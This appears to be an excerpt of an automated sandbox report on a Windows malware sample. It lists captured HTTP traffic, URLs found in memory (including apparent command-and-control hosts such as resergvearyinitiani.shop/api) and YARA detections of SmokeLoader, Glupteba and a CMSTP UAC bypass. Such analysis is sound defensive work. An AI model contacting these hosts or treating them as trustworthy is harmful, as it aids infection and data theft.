                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Content-Length: 147Date: Thu, 08 Feb 2024 18:08:44 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 47 45 54 20 2f 70 69 6e 67 2e 70 68 70 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot GET /ping.php</pre></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:09:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:09:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:09:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:09:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:09:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:09:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:09:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:09:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:09:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:09:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:09:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:10:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:10:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1534171256.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1534171256.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1534171256.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1534171256.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                  Source: explorer.exe, 00000002.00000000.1533658763.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1529283416.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1532600884.0000000007670000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000088E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                  Source: A6A0.exe, 00000011.00000003.1841420453.0000000002340000.00000004.00001000.00020000.00000000.sdmp, A6A0.exe, 00000014.00000003.1855819132.00000000021C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.innosetup.com/
                  Source: A6A0.exe, 00000011.00000003.1841420453.0000000002340000.00000004.00001000.00020000.00000000.sdmp, A6A0.exe, 00000014.00000003.1855819132.00000000021C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.remobjects.com/ps
                  Source: A6A0.exe, 00000011.00000003.1841420453.0000000002340000.00000004.00001000.00020000.00000000.sdmp, A6A0.exe, 00000014.00000003.1855819132.00000000021C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.remobjects.com/psU
                  Source: explorer.exe, 00000002.00000000.1539002335.000000000BD22000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(
                  Source: explorer.exe, 00000002.00000000.1539002335.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                  Source: explorer.exe, 00000002.00000000.1539002335.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSJM
                  Source: explorer.exe, 00000002.00000000.1539002335.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSZM
                  Source: explorer.exe, 00000002.00000000.1539002335.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSp
                  Source: explorer.exe, 00000002.00000000.1534171256.0000000008796000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/rT
                  Source: explorer.exe, 00000002.00000000.1534171256.000000000862F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc
                  Source: explorer.exe, 00000002.00000000.1534171256.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?z$
                  Source: explorer.exe, 00000002.00000000.1534171256.0000000008796000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/~T
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1529480466.0000000002F10000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                  Source: explorer.exe, 00000002.00000000.1534171256.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
                  Source: explorer.exe, 00000002.00000000.1539002335.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
                  Source: explorer.exe, 00000002.00000000.1539002335.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
                  Source: explorer.exe, 00000002.00000000.1539002335.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
                  Source: 8E91.exe, 00000009.00000002.1991101064.00000000010F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/api
                  Source: 8837.exe, 00000008.00000003.2710971456.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2697097279.0000000003454000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2702403229.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sabotage.net
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 00000002.00000000.1534171256.000000000899E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
                  Source: explorer.exe, 00000002.00000000.1539002335.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.stacker.com/arizona/phoenix
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yelp.com
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownHTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.9:49713 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.152.52:443 -> 192.168.2.9:49716 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 91.213.233.138:443 -> 192.168.2.9:49715 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.168:443 -> 192.168.2.9:49718 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.199.120:443 -> 192.168.2.9:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.83.220:443 -> 192.168.2.9:49723 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.83.220:443 -> 192.168.2.9:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 131.188.40.189:443 -> 192.168.2.9:49742 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 103.20.213.70:443 -> 192.168.2.9:49759 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 86.59.21.38:443 -> 192.168.2.9:49786 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.227.75.176:443 -> 192.168.2.9:49817 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Yara detected SmokeLoader
                  Source: Yara matchFile source: 39.3.DC49.exe.2c50000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.DC49.exe.2c40e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.DC49.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.1793881515.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1793962447.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1550099786.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2031135707.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000003.1975503858.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1549874616.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2031801803.0000000004851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

                  E-Banking Fraud

                  barindex
                  Yara detected Glupteba
                  Source: Yara matchFile source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.2e00e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000021.00000002.2027202659.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.2034312044.0000000003243000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 10.2.93D2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 16.2.93D2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
